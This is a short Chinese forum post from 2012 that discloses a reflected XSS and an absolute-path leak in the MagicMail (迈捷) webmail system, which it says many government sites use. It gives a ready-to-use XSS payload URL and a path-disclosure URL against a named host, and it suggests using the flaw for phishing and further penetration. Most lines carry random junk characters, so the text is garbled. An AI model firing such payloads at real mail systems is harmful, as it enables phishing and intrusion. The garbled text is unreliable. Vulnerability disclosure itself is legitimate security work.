今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞5 I; r9 ^+ |; t) H0 v; p
6 w5 r) _* I" h% _/ D4 n! V
4 _, K" G5 \- H, L包含 一个反射性XSS 以及 绝对路径泄漏* V7 [. ]: Z- ?2 ^9 h! C. |7 J" H- w/ d
看了看 貌似全部是linux的。
7 K2 \1 q' |& \2 i y$ A- {% g% G9 J
关键字:迈捷邮件系统 by MagicMail
) P; c+ {, y6 k; ~ h$ b' L& v1 Y6 S/ _( P
可以看到很多政府网站都用这个邮件系统
! K7 m( C& a1 ?) R- u y) ? s( I8 K7 h/ n& v
绝对路径 http://madman.in/index.php?login_type=declare&language=
4 X5 p2 q2 E2 w; Q1 |
3 ]& [& Y9 M7 v+ a0 h2 m7 Z# @$ @% e" a9 V1 [, G; u7 z0 t; _
& J! H p3 I u1 R# L
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E) a3 \2 R3 l; W8 y6 w; T( }
" d* l$ J- ^3 Q$ P9 S: F1 [
+ i' `6 ~4 k4 m1 O/ i% p( W6 _& L0 `7 p( s
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
" l1 D, h H- f) W9 ?6 m+ ? - ?4 ~+ l& L( U4 u+ v
修复方案:看官方补丁吧。
4 Q; A& H8 t8 G: G9 ?5 f! B |
发表于 2012-11-9 20:38:41
收藏
支持
反对